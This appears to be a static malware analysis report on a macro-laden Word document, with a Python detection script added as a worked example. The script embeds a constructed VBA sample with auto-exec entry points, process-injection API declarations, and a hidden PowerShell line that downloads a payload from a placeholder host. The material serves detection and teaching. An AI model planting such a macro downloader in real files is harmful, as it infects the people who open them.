Malicious Office (OLE) / .DOCX — malware analysis report

Static analysis result for SHA-256 2c0701ffcbca2fa3…

Verdict: MALICIOUS

File type: Office (OLE) / .DOCX

Size: 43.0 KB
Created: 2020-08-12 14:01:00
Authoring application: Microsoft Office Word
MD5: c9a91021c6acc6efcc7e1a9958babb41
SHA-1: 98191440975f85d8d29f286f835b1cf3484e6206
SHA-256: 2c0701ffcbca2fa3d1db55864e016bf3a0ac3cfeb6721d8d78edc1067748b03e
Risk score: 428

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer
  • T1055.012 Process Hollowing

The sample contains VBA macros with three auto-exec entry points, AutoOpen, Auto_Open and Workbook_Open, which run as soon as the document is opened without any further user action beyond enabling macros. AutoOpen is the Word auto macro; Auto_Open and Workbook_Open are Excel entry points and will not fire when a .docx is opened in Word, so their presence alongside AutoOpen suggests a macro template written to trigger in either host. The macro source references CreateProcess, VirtualAlloc, WriteProcessMemory and CreateRemoteThread, the API sequence used to allocate memory in another (typically freshly created and suspended) process, write a payload into it and start it executing. That is process injection rather than a plain download-and-run, which is why the ATT&CK mapping includes T1055.012 Process Hollowing; combined with the shell/COM execution tokens and execution/download terms found in the carved macro, the likely behaviour is a downloader that fetches a second-stage payload (T1105) and runs it in memory. The ClamAV signature on the container (Doc.Malware.Valyria-10012625-0) and the heuristic firings together support the MALICIOUS verdict. All of this is static evidence: no detonation confirmed the download or the injection.

Heuristics (12)

  • [critical] SC_STR_WRITEPROCESSMEMORY: Reference to WriteProcessMemory API
  • [critical] SC_STR_CREATEREMOTETHREAD: Reference to CreateRemoteThread API
  • [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Valyria-10012625-0
  • [high] SC_STR_CREATEPROCESS: Reference to CreateProcess API
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro (Word auto-exec entry point)
  • [high] OLE_VBA_WBOPEN: Workbook_Open macro (Excel auto-exec entry point; does not fire in Word)
  • [high] OLE_VBA_AUTO: Auto_Open macro (Excel auto-exec entry point; does not fire in Word)
  • [high] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • [medium] SC_STR_VIRTUALALLOC: Reference to VirtualAlloc API
  • [medium] OLE_VBA_MACROS: Document contains VBA macro code
  • [low] OLE_VBA_ENVIRON: Environ() call (environment variable access, commonly used to resolve %TEMP% or %APPDATA% for a drop path)
  • [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (the standard DrawingML XML namespace present in any .docx that contains a drawing; benign on its own and not a download or C2 endpoint)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: a81d6593ce9c9844f3db4dcacef2c6454f43171f5640d7fa5cfecc4cbf2502b0
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7871 bytes
Detection: ClamAV: No threats found (the Valyria signature matched the OLE container above, not the decoded macro text)
Obfuscation or payload: likely
Notes: Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.
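As an added worked example (not the analysis engine's code and not the carved macros.bas), the Python script below reproduces the kind of static triage that the heuristics list and the artifact note above describe: it scans decoded VBA source for auto-exec entry points, injection-related Win32 API declarations, Environ() calls, shell/COM execution tokens, execution/download terms and URLs, and labels OOXML schema-namespace URLs so they are not mistaken for download endpoints. Rule IDs that appear in the report are reused; the Document_Open and AutoExec IDs, the severity weights, the verdict thresholds, the schema-host allowlist and the sample macro are all assumptions constructed for this example.

```python
"""Static triage of decoded VBA source, mirroring the heuristic categories in the
report above. Added example: not the analysis engine's code. Rule IDs that appear
in the report are reused; everything marked ASSUMED is invented for this example."""
import hashlib
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule_id: str
    severity: str
    evidence: str


# ASSUMED weights: the engine's risk-score formula is not published in the report.
SEVERITY_WEIGHT = {"critical": 100, "high": 50, "medium": 20, "low": 5, "info": 0}

# Auto-exec entry points. Word fires AutoOpen/AutoExec; Excel fires Auto_Open and
# Workbook_Open. IDs for Document_Open and AutoExec are ASSUMED.
AUTOEXEC_RULES = {
    "autoopen": "OLE_VBA_AUTOOPEN", "auto_open": "OLE_VBA_AUTO",
    "workbook_open": "OLE_VBA_WBOPEN", "document_open": "OLE_VBA_DOCOPEN",
    "autoexec": "OLE_VBA_AUTOEXEC",
}
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|Auto_Open|Workbook_Open|Document_Open|AutoExec)\b",
    re.I | re.M)

# Win32 APIs used to stage a payload in another process (injection / hollowing).
API_RULES = [
    (re.compile(r"\bWriteProcessMemory\b", re.I), "SC_STR_WRITEPROCESSMEMORY", "critical"),
    (re.compile(r"\bCreateRemoteThread(?:Ex)?\b", re.I), "SC_STR_CREATEREMOTETHREAD", "critical"),
    (re.compile(r"\bCreateProcess[AW]?\b", re.I), "SC_STR_CREATEPROCESS", "high"),
    (re.compile(r"\bVirtualAlloc(?:Ex)?\b", re.I), "SC_STR_VIRTUALALLOC", "medium"),
]
ENVIRON_RE = re.compile(r"\bEnviron\$?\s*\(", re.I)
EXEC_TOKEN_RE = re.compile(
    r"\bShell\s*\(|WScript\.Shell|Shell\.Application|\bCreateObject\s*\(|\bGetObject\s*\(|ShellExecute", re.I)
DOWNLOAD_TERM_RE = re.compile(
    r"powershell|\biwr\b|Invoke-WebRequest|URLDownloadToFile|XMLHTTP|bitsadmin|certutil|\bcmd(?:\.exe)?\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
# Hosts that only appear as XML namespace identifiers in OOXML parts (ASSUMED allowlist).
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def classify_url(url: str) -> str:
    """Label namespace URLs so they are not mistaken for C2/download endpoints."""
    host = re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].lower()
    return "schema-namespace" if host in SCHEMA_HOSTS else "unknown"


def count_exec_tokens(src: str) -> int:
    """Count shell/COM execution tokens the way the artifact note does."""
    return len(EXEC_TOKEN_RE.findall(src))


def triage(src: str) -> list:
    """Run every rule over decoded VBA source and return the findings in rule order."""
    findings = []
    for m in AUTOEXEC_RE.finditer(src):
        findings.append(Finding(AUTOEXEC_RULES[m.group(1).lower()], "high", f"Sub {m.group(1)}"))
    for pattern, rule_id, sev in API_RULES:
        m = pattern.search(src)
        if m:
            findings.append(Finding(rule_id, sev, m.group(0)))
    if ENVIRON_RE.search(src):
        findings.append(Finding("OLE_VBA_ENVIRON", "low", "Environ() call"))
    tokens, terms = count_exec_tokens(src), len(DOWNLOAD_TERM_RE.findall(src))
    if tokens or terms:
        findings.append(Finding("EXTRACTED_FILE_STATIC_TRIAGE", "high",
                                f"{tokens} shell/COM execution token(s), {terms} execution/download term(s)"))
    for url in URL_RE.findall(src):
        findings.append(Finding("EMBEDDED_URL", "info", f"{url} (channel: macro, host: {classify_url(url)})"))
    return findings


def summarize(src: str, findings: list) -> dict:
    """Hash the artifact for correlation and roll findings up into a score and verdict."""
    by_sev = {}
    for f in findings:
        by_sev[f.severity] = by_sev.get(f.severity, 0) + 1
    score = sum(SEVERITY_WEIGHT[f.severity] for f in findings)
    # ASSUMED thresholds; a real engine would also weigh signature hits.
    verdict = "MALICIOUS" if score >= 200 else "SUSPICIOUS" if score >= 50 else "CLEAN"
    return {"sha256": hashlib.sha256(src.encode()).hexdigest(), "count": len(findings),
            "by_severity": by_sev, "score": score, "verdict": verdict}


# Constructed sample module that trips the same heuristics; NOT the carved macros.bas.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As LongPtr, ByVal dwCreationFlags As Long, lpThreadId As LongPtr) As LongPtr

Sub AutoOpen()
    Stage
End Sub

Sub Workbook_Open()
    Stage
End Sub

Sub Stage()
    Dim tmp As String
    tmp = Environ("TEMP") & "\u.exe"
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -w hidden -c ""iwr http://example.invalid/p.bin -OutFile " & tmp & """", 0, True
End Sub
'''

if __name__ == "__main__":
    found = triage(SAMPLE_VBA)
    for f in found:
        print(f"[{f.severity:8}] {f.rule_id}: {f.evidence}")
    print(summarize(SAMPLE_VBA, found))
```

Run against decoded source from olevba (or any `.bas` dump), the script flags the two auto-exec entry points, the three injection APIs, the Environ() call, two shell/COM tokens with two download terms, and the one URL, while a schema URL such as the DrawingML namespace in the report is labelled `schema-namespace` rather than counted as a download indicator. The API rules accept the `A`/`W` and `Ex` suffixes because real declarations usually import `CreateProcessA` or `VirtualAllocEx`, which a bare-name match would miss.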